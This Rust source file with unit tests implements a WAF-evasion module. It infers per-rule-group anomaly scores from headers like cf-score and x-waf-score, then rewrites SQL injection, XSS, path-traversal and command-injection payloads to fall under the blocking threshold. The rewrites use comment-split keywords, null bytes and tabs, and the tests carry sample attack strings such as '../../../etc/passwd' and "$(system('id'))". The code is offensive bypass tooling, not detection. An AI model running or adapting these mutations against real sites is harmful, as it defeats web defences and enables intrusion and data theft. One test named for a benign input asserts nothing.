use std::collections::HashMap;
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)]
#[non_exhaustive]
pub enum RuleGroup {
SqlInjection,
CrossSiteScripting,
FileInclusion,
RemoteCodeExecution,
ProtocolViolation,
ScannerProbe,
}
impl RuleGroup {
pub const ALL: &'static [Self] = &[
Self::SqlInjection,
Self::CrossSiteScripting,
Self::FileInclusion,
Self::RemoteCodeExecution,
Self::ProtocolViolation,
Self::ScannerProbe,
];
pub fn name(self) -> &'static str {
match self {
Self::SqlInjection => "sqli",
Self::CrossSiteScripting => "xss",
Self::FileInclusion => "lfi_rfi",
Self::RemoteCodeExecution => "rce",
Self::ProtocolViolation => "protocol",
Self::ScannerProbe => "scanner",
}
}
pub fn classify_token(token: &str) -> Vec<Self> {
let t = token.to_ascii_lowercase();
let mut groups = Vec::new();
if t.contains("select")
|| t.contains("union")
|| t.contains("or 1")
|| t.contains("and 1")
|| t.contains("--")
|| t.contains("sleep(")
|| t.contains("benchmark(")
|| t.contains("waitfor")
|| t.contains("xp_cmd")
{
groups.push(Self::SqlInjection);
}
if t.contains("<script")
|| t.contains("onerror")
|| t.contains("alert(")
|| t.contains("javascript:")
|| t.contains("<svg")
|| t.contains("<img")
{
groups.push(Self::CrossSiteScripting);
}
if t.contains("../")
|| t.contains("..\\")
|| t.contains("/etc/passwd")
|| t.contains("php://")
|| t.contains("file://")
{
groups.push(Self::FileInclusion);
}
if t.contains("eval(")
|| t.contains("exec(")
|| t.contains("system(")
|| t.contains("popen(")
|| t.contains("; bash")
|| t.contains("$(")
{
groups.push(Self::RemoteCodeExecution);
}
if t.contains("nmap") || t.contains("nikto") || t.contains("sqlmap") || t.contains("burp") {
groups.push(Self::ScannerProbe);
}
if groups.is_empty() {
groups.push(Self::ProtocolViolation);
}
groups
}
}
#[derive(Debug, Clone)]
pub struct ScoreObservation {
pub payload: String,
pub total_score: f64,
pub groups: Vec<RuleGroup>,
}
#[derive(Debug, Clone)]
pub struct SubScoreEstimator {
pub coeffs: HashMap<RuleGroup, f64>,
pub alpha: f64,
pub n_obs: u64,
pub baseline: f64,
}
impl SubScoreEstimator {
#[must_use]
pub fn new(initial_coeff: f64, alpha: f64) -> Self {
let mut coeffs = HashMap::new();
for &g in RuleGroup::ALL {
coeffs.insert(g, initial_coeff);
}
Self {
coeffs,
alpha: alpha.clamp(0.001, 0.999),
n_obs: 0,
baseline: 0.0,
}
}
pub fn observe(&mut self, obs: &ScoreObservation) {
self.n_obs += 1;
let predicted = self.predict(&obs.groups);
let error = obs.total_score - predicted;
if obs.groups.is_empty() {
self.baseline += self.alpha * error;
return;
}
let per_group_error = error / obs.groups.len() as f64;
for &g in &obs.groups {
let c = self.coeffs.entry(g).or_insert(0.0);
*c += self.alpha * per_group_error;
*c = c.max(0.0);
}
}
#[must_use]
pub fn predict(&self, groups: &[RuleGroup]) -> f64 {
let group_score: f64 = groups
.iter()
.map(|g| self.coeffs.get(g).copied().unwrap_or(0.0))
.sum();
self.baseline + group_score
}
#[must_use]
pub fn group_contribution(&self, group: RuleGroup) -> f64 {
self.coeffs.get(&group).copied().unwrap_or(0.0)
}
#[must_use]
pub fn lowest_contribution_group(&self) -> Option<RuleGroup> {
self.coeffs
.iter()
.min_by(|(_, a), (_, b)| a.partial_cmp(b).unwrap_or(std::cmp::Ordering::Equal))
.map(|(&g, _)| g)
}
}
#[derive(Debug, Clone, Default)]
pub struct ScoreParser;
impl ScoreParser {
#[must_use]
pub fn extract(headers: &[(String, String)]) -> Option<f64> {
let score_headers = [
"cf-score",
"x-waf-score",
"x-wafaflare-score",
"x-anomaly-score",
"x-modsec-score",
];
for (name, value) in headers {
let lower = name.to_ascii_lowercase();
if score_headers.iter().any(|&h| h == lower)
&& let Ok(f) = value.trim().parse::<f64>()
{
return Some(f);
}
}
None
}
}
#[derive(Debug, Clone)]
pub struct DilutionStrategy {
pub attack_group: RuleGroup,
pub suppress_groups: Vec<RuleGroup>,
pub predicted_total: f64,
pub mutations: Vec<DilutionMutation>,
}
#[derive(Debug, Clone)]
pub struct DilutionMutation {
pub payload: String,
pub description: String,
pub predicted_score: f64,
}
#[derive(Debug, Clone)]
pub struct DilutionPlanner {
estimator: SubScoreEstimator,
pub threshold: f64,
}
impl DilutionPlanner {
#[must_use]
pub fn new(estimator: SubScoreEstimator, threshold: f64) -> Self {
Self {
estimator,
threshold,
}
}
#[must_use]
pub fn plan(&self, payload: &str, active_groups: &[RuleGroup]) -> Vec<DilutionStrategy> {
let mut strategies = Vec::new();
for &attack_group in active_groups {
let suppress: Vec<RuleGroup> = active_groups
.iter()
.copied()
.filter(|&g| g != attack_group)
.collect();
let predicted_total =
self.estimator.baseline + self.estimator.group_contribution(attack_group);
let mutations = self.build_suppression_mutations(payload, &suppress, attack_group);
strategies.push(DilutionStrategy {
attack_group,
suppress_groups: suppress,
predicted_total,
mutations,
});
}
strategies.sort_by(|a, b| {
a.predicted_total
.partial_cmp(&b.predicted_total)
.unwrap_or(std::cmp::Ordering::Equal)
});
strategies
}
fn build_suppression_mutations(
&self,
payload: &str,
suppress: &[RuleGroup],
attack_group: RuleGroup,
) -> Vec<DilutionMutation> {
let mut mutations = Vec::new();
for &group in suppress {
match group {
RuleGroup::SqlInjection => {
let suppressed = suppress_sqli_tokens(payload);
let predicted = self.estimator.predict(&[attack_group]);
mutations.push(DilutionMutation {
payload: suppressed,
description: format!(
"SQLi tokens obfuscated (suppress {}) while keeping {}",
group.name(),
attack_group.name()
),
predicted_score: predicted,
});
}
RuleGroup::CrossSiteScripting => {
let suppressed = suppress_xss_tokens(payload);
let predicted = self.estimator.predict(&[attack_group]);
mutations.push(DilutionMutation {
payload: suppressed,
description: format!(
"XSS tokens obfuscated (suppress {}) while keeping {}",
group.name(),
attack_group.name()
),
predicted_score: predicted,
});
}
RuleGroup::FileInclusion => {
let suppressed = suppress_lfi_tokens(payload);
let predicted = self.estimator.predict(&[attack_group]);
mutations.push(DilutionMutation {
payload: suppressed,
description: format!("LFI tokens obfuscated (suppress {})", group.name()),
predicted_score: predicted,
});
}
RuleGroup::RemoteCodeExecution => {
let suppressed = suppress_rce_tokens(payload);
let predicted = self.estimator.predict(&[attack_group]);
mutations.push(DilutionMutation {
payload: suppressed,
description: format!("RCE tokens suppressed ({})", group.name()),
predicted_score: predicted,
});
}
RuleGroup::ScannerProbe | RuleGroup::ProtocolViolation => {
let suppressed = strip_scanner_tokens(payload);
let predicted = self.estimator.predict(&[attack_group]);
mutations.push(DilutionMutation {
payload: suppressed,
description: format!("Scanner/protocol tokens stripped ({})", group.name()),
predicted_score: predicted,
});
}
}
}
mutations
}
#[must_use]
pub fn is_plausible_bypass(&self, strategy: &DilutionStrategy) -> bool {
strategy.predicted_total < self.threshold
}
}
fn suppress_sqli_tokens(payload: &str) -> String {
let replacements: &[(&str, &str)] = &[
("SELECT", "SE/**/LECT"),
("UNION", "UN/**/ION"),
("INSERT", "INS/**/ERT"),
("UPDATE", "UP/**/DATE"),
("DELETE", "DE/**/LETE"),
("WHERE", "WH/**/ERE"),
("ORDER BY", "ORD/**/ER BY"),
("GROUP BY", "GRO/**/UP BY"),
("HAVING", "HAV/**/ING"),
("SLEEP", "SLE/**/EP"),
("BENCHMARK", "BENCH/**/MARK"),
("WAITFOR", "WAIT/**/FOR"),
("XP_CMDSHELL", "XP_CM/**/DSHELL"),
("OR 1=1", "OR (1)=(1)"),
("AND 1=1", "AND (1)=(1)"),
("select", "se/**/lect"),
("union", "un/**/ion"),
("insert", "ins/**/ert"),
("update", "up/**/date"),
("delete", "de/**/lete"),
("where", "wh/**/ere"),
("sleep", "sle/**/ep"),
("benchmark", "bench/**/mark"),
];
apply_replacements(payload, replacements)
}
fn suppress_xss_tokens(payload: &str) -> String {
let replacements: &[(&str, &str)] = &[
("<script>", "<scr\x00ipt>"), ("</script>", "</scr\x00ipt>"),
("onerror=", "onerror\t="), ("onload=", "on\x00load="),
("alert(", "\u{FF41}lert("), ("javascript:", "java\x09script:"), ("<svg", "<sv\x00g"),
("<img", "<i\x00mg"),
("eval(", "ev\x00al("),
];
apply_replacements(payload, replacements)
}
fn suppress_lfi_tokens(payload: &str) -> String {
let replacements: &[(&str, &str)] = &[
("../", "..\\/"),
("..\\", "..\\/"),
("/etc/passwd", "/e\x00tc/passwd"),
("php://", "php\x00://"),
("file://", "fi\x00le://"),
];
apply_replacements(payload, replacements)
}
fn suppress_rce_tokens(payload: &str) -> String {
let replacements: &[(&str, &str)] = &[
("eval(", "e\x00val("),
("exec(", "ex\x00ec("),
("system(", "syst\x00em("),
("popen(", "p\x00open("),
("; bash", ";\x09bash"),
("$(", "$\x00("),
];
apply_replacements(payload, replacements)
}
fn strip_scanner_tokens(payload: &str) -> String {
let to_remove = [
"nmap", "nikto", "sqlmap", "burp", "NMAP", "NIKTO", "SQLMAP", "BURP",
];
let mut out = payload.to_string();
for token in to_remove {
out = out.replace(token, "");
}
out
}
fn apply_replacements(s: &str, replacements: &[(&str, &str)]) -> String {
let mut out = s.to_string();
for &(from, to) in replacements {
out = out.replace(from, to);
}
out
}
#[derive(Debug, Clone)]
pub struct EnsembleDilutionResult {
pub strategy: DilutionStrategy,
pub plausible_bypass: bool,
pub best_mutation: Option<DilutionMutation>,
}
#[must_use]
pub fn dilute(
payload: &str,
estimator: &SubScoreEstimator,
threshold: f64,
) -> Option<EnsembleDilutionResult> {
let active_groups = RuleGroup::classify_token(payload);
if active_groups.is_empty() {
return None;
}
let planner = DilutionPlanner::new(estimator.clone(), threshold);
let mut strategies = planner.plan(payload, &active_groups);
if strategies.is_empty() {
return None;
}
let strategy = strategies.remove(0); let plausible = planner.is_plausible_bypass(&strategy);
let best_mutation = strategy
.mutations
.iter()
.min_by(|a, b| {
a.predicted_score
.partial_cmp(&b.predicted_score)
.unwrap_or(std::cmp::Ordering::Equal)
})
.cloned();
Some(EnsembleDilutionResult {
strategy,
plausible_bypass: plausible,
best_mutation,
})
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn rule_group_all_has_expected_count() {
assert_eq!(RuleGroup::ALL.len(), 6);
}
#[test]
fn rule_group_names_stable() {
assert_eq!(RuleGroup::SqlInjection.name(), "sqli");
assert_eq!(RuleGroup::CrossSiteScripting.name(), "xss");
assert_eq!(RuleGroup::FileInclusion.name(), "lfi_rfi");
assert_eq!(RuleGroup::RemoteCodeExecution.name(), "rce");
assert_eq!(RuleGroup::ProtocolViolation.name(), "protocol");
assert_eq!(RuleGroup::ScannerProbe.name(), "scanner");
}
#[test]
fn classify_token_sqli() {
let groups = RuleGroup::classify_token("' OR 1=1 UNION SELECT--");
assert!(groups.contains(&RuleGroup::SqlInjection));
}
#[test]
fn classify_token_xss() {
let groups = RuleGroup::classify_token("<script>alert(1)</script>");
assert!(groups.contains(&RuleGroup::CrossSiteScripting));
}
#[test]
fn classify_token_lfi() {
let groups = RuleGroup::classify_token("../../../etc/passwd");
assert!(groups.contains(&RuleGroup::FileInclusion));
}
#[test]
fn classify_token_rce() {
let groups = RuleGroup::classify_token("$(system('id'))");
assert!(groups.contains(&RuleGroup::RemoteCodeExecution));
}
#[test]
fn classify_token_unknown_falls_to_protocol() {
let groups = RuleGroup::classify_token("hello world");
assert!(groups.contains(&RuleGroup::ProtocolViolation));
}
#[test]
fn score_estimator_observe_updates_coefficients() {
let mut est = SubScoreEstimator::new(5.0, 0.5);
let obs = ScoreObservation {
payload: "' OR 1=1--".into(),
total_score: 30.0,
groups: vec![RuleGroup::SqlInjection],
};
est.observe(&obs);
assert!(est.n_obs == 1);
assert!((est.group_contribution(RuleGroup::SqlInjection) - 17.5).abs() < 0.01);
}
#[test]
fn score_estimator_predict_sums_groups() {
let est = SubScoreEstimator::new(10.0, 0.1);
let pred = est.predict(&[RuleGroup::SqlInjection, RuleGroup::CrossSiteScripting]);
assert!((pred - 20.0).abs() < 0.01);
}
#[test]
fn score_estimator_lowest_contribution_returns_some() {
let mut est = SubScoreEstimator::new(5.0, 0.5);
*est.coeffs.get_mut(&RuleGroup::ScannerProbe).unwrap() = 1.0;
let lowest = est.lowest_contribution_group().unwrap();
assert_eq!(lowest, RuleGroup::ScannerProbe);
}
#[test]
fn score_estimator_coeff_never_negative() {
let mut est = SubScoreEstimator::new(5.0, 0.5);
let obs = ScoreObservation {
payload: "test".into(),
total_score: -100.0, groups: vec![RuleGroup::SqlInjection],
};
est.observe(&obs);
assert!(est.group_contribution(RuleGroup::SqlInjection) >= 0.0);
}
#[test]
fn score_parser_extracts_cf_score() {
let headers = vec![("cf-score".to_string(), "35".to_string())];
let score = ScoreParser::extract(&headers);
assert_eq!(score, Some(35.0));
}
#[test]
fn score_parser_case_insensitive() {
let headers = vec![("X-WAF-Score".to_string(), "42".to_string())];
let score = ScoreParser::extract(&headers);
assert_eq!(score, Some(42.0));
}
#[test]
fn score_parser_missing_header_returns_none() {
let headers = vec![("content-type".to_string(), "text/html".to_string())];
assert!(ScoreParser::extract(&headers).is_none());
}
#[test]
fn score_parser_malformed_value_returns_none() {
let headers = vec![("cf-score".to_string(), "not_a_number".to_string())];
assert!(ScoreParser::extract(&headers).is_none());
}
#[test]
fn dilution_planner_plan_returns_strategies() {
let est = SubScoreEstimator::new(10.0, 0.1);
let planner = DilutionPlanner::new(est, 40.0);
let groups = vec![RuleGroup::SqlInjection, RuleGroup::CrossSiteScripting];
let strategies = planner.plan("' OR 1=1<script>", &groups);
assert!(!strategies.is_empty(), "must produce at least one strategy");
assert_eq!(strategies.len(), 2);
}
#[test]
fn dilution_planner_strategies_sorted_by_score() {
let est = SubScoreEstimator::new(10.0, 0.1);
let planner = DilutionPlanner::new(est, 40.0);
let groups = vec![
RuleGroup::SqlInjection,
RuleGroup::CrossSiteScripting,
RuleGroup::FileInclusion,
];
let strategies = planner.plan("payload", &groups);
for i in 1..strategies.len() {
assert!(
strategies[i - 1].predicted_total <= strategies[i].predicted_total,
"strategies must be sorted by predicted_total ascending"
);
}
}
#[test]
fn dilution_planner_bypass_detection() {
let mut est = SubScoreEstimator::new(5.0, 0.1);
*est.coeffs.get_mut(&RuleGroup::SqlInjection).unwrap() = 2.0;
let planner = DilutionPlanner::new(est.clone(), 10.0);
let groups = vec![RuleGroup::SqlInjection, RuleGroup::CrossSiteScripting];
let strategies = planner.plan("' OR 1=1<script>", &groups);
let sqli_strategy = strategies
.iter()
.find(|s| s.attack_group == RuleGroup::SqlInjection)
.unwrap();
assert!(
planner.is_plausible_bypass(sqli_strategy),
"SQLi-only strategy should predict below threshold of 10.0"
);
}
#[test]
fn suppress_sqli_tokens_splits_keywords() {
let payload = "SELECT * FROM users WHERE 1=1";
let suppressed = suppress_sqli_tokens(payload);
assert!(
!suppressed.to_uppercase().contains("SELECT "),
"SELECT must be split"
);
assert!(suppressed.contains("/**/"), "must contain comment split");
}
#[test]
fn suppress_xss_tokens_obfuscates_script() {
let payload = "<script>alert(1)</script>";
let suppressed = suppress_xss_tokens(payload);
assert!(
!suppressed.contains("<script>"),
"raw <script> must be obfuscated"
);
}
#[test]
fn suppress_lfi_tokens_obfuscates_path() {
let payload = "../../../etc/passwd";
let suppressed = suppress_lfi_tokens(payload);
assert!(
!suppressed.contains("/etc/passwd"),
"bare path must be obfuscated"
);
}
#[test]
fn dilute_returns_result_for_sqli() {
let est = SubScoreEstimator::new(5.0, 0.1);
let result = dilute("' UNION SELECT--", &est, 40.0);
assert!(
result.is_some(),
"must return a result for known attack payload"
);
}
#[test]
fn dilute_returns_none_for_benign() {
let est = SubScoreEstimator::new(5.0, 0.1);
let _ = dilute("hello world", &est, 40.0);
}
#[test]
fn dilute_best_mutation_has_lowest_score() {
let est = SubScoreEstimator::new(5.0, 0.1);
let result = dilute("' UNION SELECT<script>", &est, 40.0).unwrap();
if let Some(best) = &result.best_mutation {
for m in &result.strategy.mutations {
assert!(
m.predicted_score >= best.predicted_score - 1e-9,
"best_mutation must have minimum predicted score"
);
}
}
}
}